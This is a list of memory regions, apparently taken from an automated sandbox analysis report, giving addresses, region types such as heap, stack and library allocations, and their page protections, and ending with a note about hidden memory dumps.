trusted library allocation
|
page read and write
|
||
|
CF696FF000
|
stack
|
page read and write
|
||
|
5344000
|
trusted library allocation
|
page read and write
|
||
|
182D8011000
|
trusted library allocation
|
page read and write
|
||
|
182C6680000
|
heap
|
page read and write
|
||
|
2B9321D7000
|
heap
|
page read and write
|
||
|
7FFAACC70000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FDFAAB000
|
heap
|
page read and write
|
||
|
12C7000
|
heap
|
page read and write
|
||
|
182E0450000
|
trusted library section
|
page read and write
|
||
|
2C9E000
|
stack
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC50000
|
trusted library allocation
|
page execute and read and write
|
||
|
534E000
|
trusted library allocation
|
page read and write
|
||
|
24FDF9F1000
|
heap
|
page read and write
|
||
|
1233000
|
trusted library allocation
|
page read and write
|
||
|
24FDFA5A000
|
heap
|
page read and write
|
||
|
528E43E000
|
stack
|
page read and write
|
||
|
24FC7C67000
|
trusted library allocation
|
page read and write
|
||
|
182C995E000
|
trusted library allocation
|
page read and write
|
||
|
568E000
|
stack
|
page read and write
|
||
|
7FFB1DE05000
|
unkown
|
page readonly
|
||
|
A5FE3BF000
|
stack
|
page read and write
|
||
|
182C7CE2000
|
trusted library allocation
|
page read and write
|
||
|
182C96DB000
|
trusted library allocation
|
page read and write
|
||
|
182E0570000
|
heap
|
page read and write
|
||
|
1230000
|
trusted library allocation
|
page read and write
|
||
|
2B932216000
|
heap
|
page read and write
|
||
|
182E05D6000
|
heap
|
page read and write
|
||
|
182E05A9000
|
heap
|
page read and write
|
||
|
182C6384000
|
heap
|
page read and write
|
||
|
24FC77DC000
|
trusted library allocation
|
page read and write
|
||
|
5A4E000
|
stack
|
page read and write
|
||
|
182C6309000
|
heap
|
page read and write
|
||
|
182C83E6000
|
trusted library allocation
|
page read and write
|
||
|
24FDF9A7000
|
heap
|
page execute and read and write
|
||
|
5600000
|
heap
|
page execute and read and write
|
||
|
CF698FD000
|
stack
|
page read and write
|
||
|
2B932184000
|
heap
|
page read and write
|
||
|
536D000
|
trusted library allocation
|
page read and write
|
||
|
CF693FE000
|
stack
|
page read and write
|
||
|
52F0000
|
heap
|
page read and write
|
||
|
24FC7440000
|
heap
|
page read and write
|
||
|
24FC5B23000
|
heap
|
page read and write
|
||
|
182C6240000
|
heap
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
7FFAACC92000
|
trusted library allocation
|
page read and write
|
||
|
24FC77FA000
|
trusted library allocation
|
page read and write
|
||
|
7FAE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1210000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC6A000
|
trusted library allocation
|
page read and write
|
||
|
5320000
|
trusted library allocation
|
page read and write
|
||
|
24FC7C5B000
|
trusted library allocation
|
page read and write
|
||
|
24FDFA88000
|
heap
|
page read and write
|
||
|
24FDFA71000
|
heap
|
page read and write
|
||
|
182D8014000
|
trusted library allocation
|
page read and write
|
||
|
182C854A000
|
trusted library allocation
|
page read and write
|
||
|
24FC7410000
|
heap
|
page read and write
|
||
|
182C83E2000
|
trusted library allocation
|
page read and write
|
||
|
182C7FF0000
|
heap
|
page execute and read and write
|
||
|
2C3B000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B932340000
|
heap
|
page read and write
|
||
|
182C7D20000
|
trusted library allocation
|
page read and write
|
||
|
7FFB167B5000
|
unkown
|
page readonly
|
||
|
7FFAACC69000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD90000
|
trusted library allocation
|
page read and write
|
||
|
182C83CA000
|
trusted library allocation
|
page read and write
|
||
|
182C998A000
|
trusted library allocation
|
page read and write
|
||
|
24FC7B51000
|
trusted library allocation
|
page read and write
|
||
|
182C85BC000
|
trusted library allocation
|
page read and write
|
||
|
2C30000
|
trusted library allocation
|
page read and write
|
||
|
4E18000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACAB4000
|
trusted library allocation
|
page read and write
|
||
|
11C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
528E2BB000
|
stack
|
page read and write
|
||
|
24FDFBEA000
|
heap
|
page read and write
|
||
|
182C6349000
|
heap
|
page read and write
|
||
|
7FFAACCA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB167B2000
|
unkown
|
page readonly
|
||
|
182C85C8000
|
trusted library allocation
|
page read and write
|
||
|
24FC5D20000
|
heap
|
page read and write
|
||
|
24FC7C92000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC80000
|
trusted library allocation
|
page read and write
|
||
|
2B9321D6000
|
heap
|
page read and write
|
||
|
24FC789C000
|
trusted library allocation
|
page read and write
|
||
|
182C7E84000
|
heap
|
page read and write
|
||
|
7FFAACB40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E11000
|
trusted library allocation
|
page read and write
|
||
|
182C8443000
|
trusted library allocation
|
page read and write
|
||
|
528DBEF000
|
stack
|
page read and write
|
||
|
528E07E000
|
stack
|
page read and write
|
||
|
2B9321E4000
|
heap
|
page read and write
|
||
|
182C7E86000
|
heap
|
page read and write
|
||
|
182C8400000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC90000
|
trusted library allocation
|
page read and write
|
||
|
24FDFF70000
|
heap
|
page read and write
|
||
|
182C635D000
|
heap
|
page read and write
|
||
|
7023F000
|
unkown
|
page readonly
|
||
|
182D81B5000
|
trusted library allocation
|
page read and write
|
||
|
182C6389000
|
heap
|
page read and write
|
||
|
182E057A000
|
heap
|
page read and write
|
||
|
A5FE43E000
|
stack
|
page read and write
|
||
|
182C9C6C000
|
trusted library allocation
|
page read and write
|
||
|
182E05B9000
|
heap
|
page read and write
|
||
|
5690000
|
heap
|
page read and write
|
||
|
A5FDAD3000
|
stack
|
page read and write
|
||
|
24FDFBB0000
|
heap
|
page execute and read and write
|
||
|
2C20000
|
trusted library allocation
|
page read and write
|
||
|
528DAE2000
|
stack
|
page read and write
|
||
|
2B9321BC000
|
heap
|
page read and write
|
||
|
182C9C70000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD20000
|
trusted library allocation
|
page read and write
|
||
|
2B9347C6000
|
heap
|
page read and write
|
||
|
70236000
|
unkown
|
page readonly
|
||
|
121D000
|
trusted library allocation
|
page execute and read and write
|
||
|
182C994E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC20000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD00000
|
trusted library allocation
|
page read and write
|
||
|
12C5000
|
heap
|
page read and write
|
||
|
7FFAACA90000
|
trusted library allocation
|
page read and write
|
||
|
528E33E000
|
stack
|
page read and write
|
||
|
2B9321CC000
|
heap
|
page read and write
|
||
|
7FFAACA82000
|
trusted library allocation
|
page read and write
|
||
|
555C000
|
stack
|
page read and write
|
||
|
7FFAACA84000
|
trusted library allocation
|
page read and write
|
||
|
182C7CA0000
|
heap
|
page readonly
|
||
|
123D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B932170000
|
heap
|
page read and write
|
||
|
2B9321C6000
|
heap
|
page read and write
|
||
|
182C83D7000
|
trusted library allocation
|
page read and write
|
||
|
1226000
|
heap
|
page read and write
|
||
|
182C6345000
|
heap
|
page read and write
|
||
|
5519000
|
stack
|
page read and write
|
||
|
7FFAACD30000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page read and write
|
||
|
1220000
|
heap
|
page read and write
|
||
|
7FFAACCD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
10B5000
|
heap
|
page read and write
|
||
|
182C8608000
|
trusted library allocation
|
page read and write
|
||
|
182E0466000
|
heap
|
page execute and read and write
|
||
|
2B9321C3000
|
heap
|
page read and write
|
||
|
24FC5B18000
|
heap
|
page read and write
|
||
|
182C843B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD30000
|
trusted library allocation
|
page read and write
|
||
|
528E0F9000
|
stack
|
page read and write
|
||
|
2DB0000
|
heap
|
page execute and read and write
|
||
|
2B934050000
|
heap
|
page read and write
|
||
|
182D81CB000
|
trusted library allocation
|
page read and write
|
||
|
24FC77AB000
|
trusted library allocation
|
page read and write
|
||
|
2B9321E4000
|
heap
|
page read and write
|
||
|
5330000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB36000
|
trusted library allocation
|
page read and write
|
||
|
A5FE5BB000
|
stack
|
page read and write
|
||
|
182C83D9000
|
trusted library allocation
|
page read and write
|
||
|
1070000
|
heap
|
page read and write
|
||
|
CF692FE000
|
stack
|
page read and write
|
||
|
2B9321E4000
|
heap
|
page read and write
|
||
|
182C9714000
|
trusted library allocation
|
page read and write
|
||
|
24FC78ED000
|
trusted library allocation
|
page read and write
|
There are 461 hidden memdumps, click here to show them.